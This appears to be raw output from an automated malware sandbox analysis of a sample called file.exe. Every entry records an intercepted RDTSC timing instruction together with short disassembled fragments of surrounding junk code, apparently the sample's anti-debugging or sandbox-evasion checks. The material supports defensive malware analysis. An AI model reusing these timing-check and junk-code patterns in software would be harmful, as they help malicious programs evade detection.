              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 836EC4 second address: 836EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83713E second address: 837142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837142 second address: 83716F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBF65134596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007FBF65134596h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBF651345A3h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC82B second address: 7EC82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC8E9 second address: 7EC8EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EC8EF second address: 7EC8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837869 second address: 83787E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651345A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83787E second address: 837883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AAD9 second address: 83AADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AC32 second address: 83AC49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B4Eh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AC49 second address: 83AC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E631 second address: 83E637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E637 second address: 83E647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007FBF65134596h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E647 second address: 83E64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E781 second address: 83E787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E787 second address: 83E7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF65561B54h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FBF65561B46h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83E7AF second address: 83E7CF instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF65134596h 0x00000008 jmp 00007FBF6513459Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 jbe 00007FBF65134596h 0x00000018 pop ebx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83EA66 second address: 83EA8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B56h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007FBF65561B46h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83EA8C second address: 83EAA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651345A2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845206 second address: 845210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBF65561B46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845607 second address: 84562A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF651345A8h 0x00000009 jnp 00007FBF65134596h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84562A second address: 84562F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84562F second address: 845637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845637 second address: 84563D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845B7D second address: 845B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845E75 second address: 845E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF65561B57h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8461A5 second address: 8461A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8461A9 second address: 8461AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8461AD second address: 8461B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846445 second address: 846489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B58h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF65561B55h 0x0000000e jmp 00007FBF65561B53h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846C74 second address: 846C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A08B second address: 84A08F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A08F second address: 84A09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A09B second address: 84A09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A09F second address: 84A0B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007FBF651345BAh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A0B0 second address: 84A0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A0B4 second address: 84A0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A347 second address: 84A36E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF65561B46h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FBF65561B58h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A78B second address: 84A79D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FBF6513459Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A79D second address: 84A7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A7A2 second address: 84A7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FBF65134596h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 jmp 00007FBF651345A4h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A7CC second address: 84A7D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A929 second address: 84A973 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF651345A0h 0x00000008 jmp 00007FBF6513459Ah 0x0000000d jnl 00007FBF6513459Ah 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 ja 00007FBF651345ACh 0x0000001c ja 00007FBF6513459Ch 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F445 second address: 84F453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FBF65561B46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850A2E second address: 850A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FBF65134596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850A3A second address: 850A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850A3E second address: 850A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850A42 second address: 850A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF65561B4Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF65561B4Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8582EC second address: 858303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651345A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856406 second address: 856420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856420 second address: 856424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856424 second address: 856428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856428 second address: 85642E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85642E second address: 856438 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF65561B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85656F second address: 85658E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FBF651345A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8569E6 second address: 8569EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8569EC second address: 8569F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8569F0 second address: 8569F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856B60 second address: 856B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856D02 second address: 856D31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBF65561B51h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856D31 second address: 856D3B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF6513459Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856E6E second address: 856E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856E72 second address: 856E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856FAB second address: 856FCC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FBF65561B57h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857126 second address: 85712A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85712A second address: 857146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF65561B56h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857146 second address: 857176 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF651345B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8580D7 second address: 8580F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBF65561B4Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FBF65561B46h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8580F3 second address: 85810B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651345A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85810B second address: 858130 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007FBF65561B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF65561B56h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858130 second address: 858135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858135 second address: 85813B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FCF7 second address: 85FCFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FCFB second address: 85FD03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FD03 second address: 85FD1B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FBF65134596h 0x00000009 ja 00007FBF65134596h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FBF65134596h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85FD1B second address: 85FD4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B50h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f jmp 00007FBF65561B58h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F77A second address: 85F780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F780 second address: 85F7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FBF65561B4Eh 0x0000000b js 00007FBF65561B60h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FBF65561B58h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85F7BC second address: 85F7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FBF65134596h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D939 second address: 86D956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FBF65561B56h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8712A9 second address: 8712AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8712AF second address: 8712B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8712B3 second address: 8712DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF651345A3h 0x00000007 jmp 00007FBF651345A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8712DD second address: 8712E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87881C second address: 878824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878824 second address: 87882F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87882F second address: 878835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883937 second address: 88393B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88393B second address: 88393F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883794 second address: 88379E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF65561B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88379E second address: 8837A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A004 second address: 88A029 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF65561B46h 0x00000008 jmp 00007FBF65561B53h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FBF65561B46h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A029 second address: 88A02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A1A4 second address: 88A1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A341 second address: 88A34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A34D second address: 88A352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A498 second address: 88A49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A49C second address: 88A4C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF65561B59h 0x00000007 jmp 00007FBF65561B50h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A809 second address: 88A80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88A80D second address: 88A822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBF65561B48h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B36F second address: 88B392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF651345A1h 0x0000000d push eax 0x0000000e jng 00007FBF65134596h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B392 second address: 88B39C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF65561B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88F21C second address: 88F22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pushad 0x00000007 jp 00007FBF65134596h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89CF69 second address: 89CFA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBF65561B4Bh 0x0000000e jmp 00007FBF65561B53h 0x00000013 jmp 00007FBF65561B56h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89F4BA second address: 89F4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
